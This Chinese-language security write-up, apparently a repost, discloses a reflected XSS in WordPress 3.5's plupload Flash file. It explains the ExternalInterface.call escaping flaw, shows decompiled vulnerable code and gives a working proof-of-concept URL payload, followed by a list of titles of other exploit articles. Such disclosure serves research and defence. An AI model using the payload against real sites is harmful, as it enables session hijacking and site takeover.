WordPress反射型跨站(0day)
WordPress3.5某处Flash应用存在漏洞,可能导致跨站脚本攻击。
当一个已经登录后台的会话访问某一特定网页时,攻击者精心构造的payload可以在后台添加一个同等权限的用户,并写入Shell(如果权限允许的话)。
http://player.youku.com/player.php/sid/XNTAwMjY0MzQ4/v.swf
这种类型的漏洞是Google的大牛Michal Zalewski最先公开的,我这里就简单说明下。(原文 The other reason to beware ExternalInterface.call() -- http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html)
as脚本运行flash.external.ExternalInterface.call($methodName, $parameter)时,flash player会调用HTML的js,运行
try { __flash__toXML($methodName("$parameter")) ; } catch (e) { "
如果我们试着尝试在$parameter中加入" 如flash.external.ExternalInterface.call("alert",'"2'),js运行的是
try { __flash__toXML(alert("\"2")) ; } catch (e) { "
flash player会对"进行转义,但搞笑的是对于传入的\,flash player却原样输出了,如此一来,我们就可以利用传入的\去转义原本用来转义"的转义符\。
flash.external.ExternalInterface.call("alert",'\\"2')
try { __flash__toXML(alert("\\"2")) ; } catch (e) { "
剩下的就是闭合)}这类的事情了
flash.external.ExternalInterface.call("alert",'\\"2))}catch(e){alert(3)//')
try { __flash__toXML(alert("\\"2))}catch(e){alert(3)//}")) ; } catch (e) { "
Vulnerable SWF File: /wp-includes/js/plupload/plupload.flash.swf
Vulnerable Code:
com.plupload.Plupload www.2cto.com
private function init(event:Event = null) : void
{
removeEventListener(Event.ADDED_TO_STAGE, this.init);
this.id = this.stage.loaderInfo.parameters["id"];
...
this.fireEvent("Init");
return;
}// end function
...
private function fireEvent(param1:String, param2:Object = null) : void
{
ExternalInterface.call("plupload.flash.trigger", this.id, param1, param2);
return;
}// end function
原始SWF下载:http://swfpoc.appspot.com/vul/wordpress_plupload.flash.swf
Proof of Concept:
http://wordpress/wp-includes/js/plupload/plupload.flash.swf?id=0\"))}catch(e){if(!window.x){window.x=1;alert(2)}}//
本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)
- ·微软Internet Explorer浏览器Jscript.Dll
- ·CVE-2019-0708远程桌面代码执行漏洞复现
- ·Harbor任意管理员注册漏洞
- ·微软RDP远程代码执行漏洞(CVE-2019-0708
- ·有上传文件的文件名处发现的时间延迟注入
- ·Xstream远程代码执行漏洞
- ·文本编辑器VimNeovim被曝任意代码执行漏
- ·PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf
- ·戴尔电脑自带系统软件SupportAssist存在R
- ·CatFish CMS V4.8.75最新版XSS漏洞审计
- ·Easy WP SMTP(v1.3.9)0 day漏洞被攻击
- ·Weblogic反序列化远程代码执行漏洞(CVE-
- ·【漏洞预警】Weblogic反序列化远程命令执
- ·ThinkPHP 5.1框架结合RCE漏洞的深入分析
- ·WordPress Core 5.0 - Remote Code Execu
- ·NetSetMan 4.7.1 - Local Buffer Overflo
- ·微软Internet Explorer浏览器Jscript.Dll组
- ·CVE-2019-0708远程桌面代码执行漏洞复现
- ·Harbor任意管理员注册漏洞
- ·微软RDP远程代码执行漏洞(CVE-2019-0708)
- ·有上传文件的文件名处发现的时间延迟注入漏
- ·Xstream远程代码执行漏洞
- ·文本编辑器VimNeovim被曝任意代码执行漏洞
- ·PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf
- ·戴尔电脑自带系统软件SupportAssist存在RCE
- ·CatFish CMS V4.8.75最新版XSS漏洞审计
- ·Easy WP SMTP(v1.3.9)0 day漏洞被攻击的
- ·Weblogic反序列化远程代码执行漏洞(CVE-20
- ·【漏洞预警】Weblogic反序列化远程命令执行
- ·ThinkPHP 5.1框架结合RCE漏洞的深入分析
- ·WordPress Core 5.0 - Remote Code Executi
- ·Discuz! X系列远程代码执行漏洞分析
- ·Drupal 7.31 SQL注入漏洞(CVE-2014-3704)
- ·TRS 漏洞整理
- ·Discuz x1.5获取任意用户cookie
- ·dedecms最新版本修改任意管理员漏洞+getshe
- ·php LFI读php文件源码以及直接post webshel
- ·爱丽网子域名站SQL注射登录后台
- ·Oracle WebCenter CheckOutAndOpen.dll Act
- ·DedeCMS Dialog目录下配置文件XSS漏洞
- ·Mutiny 5 任意文件上传
- ·新浪家居某功能储存型xss
- ·韩国HOMPYNET CMS漏洞
- ·Nvidia显示驱动服务(nvvsvc.exe)权限提升漏
- ·Microsoft Internet Explorer 6/7/8 mshtml
- ·AspCms_v1.5_20110517 SQL注射漏洞及修复
- ·Discuz x1.5获取任意用户cookie
- ·dedecms最新版本修改任意管理员漏洞+getshe
- ·TRS 漏洞整理
- ·Drupal 7.31 SQL注入漏洞(CVE-2014-3704)
- ·新浪家居某功能储存型xss
- ·phpok通杀前台getshell 4.0.515官方demo测
- ·PHPCMS V9投稿操作权限绕过及修复
- ·dedecms某一处insert型注入
- ·小红伞 提权 0day Avira avipbb.sys Privil
- ·phpcms 2008 sp4 后台低权限拿shell(自身
- ·Mutiny 5 任意文件上传
- ·php LFI读php文件源码以及直接post webshel
- ·爱丽网移动站SQL注入漏洞
- ·爱丽网子域名站SQL注射登录后台
- ·Oracle WebCenter CheckOutAndOpen.dll Act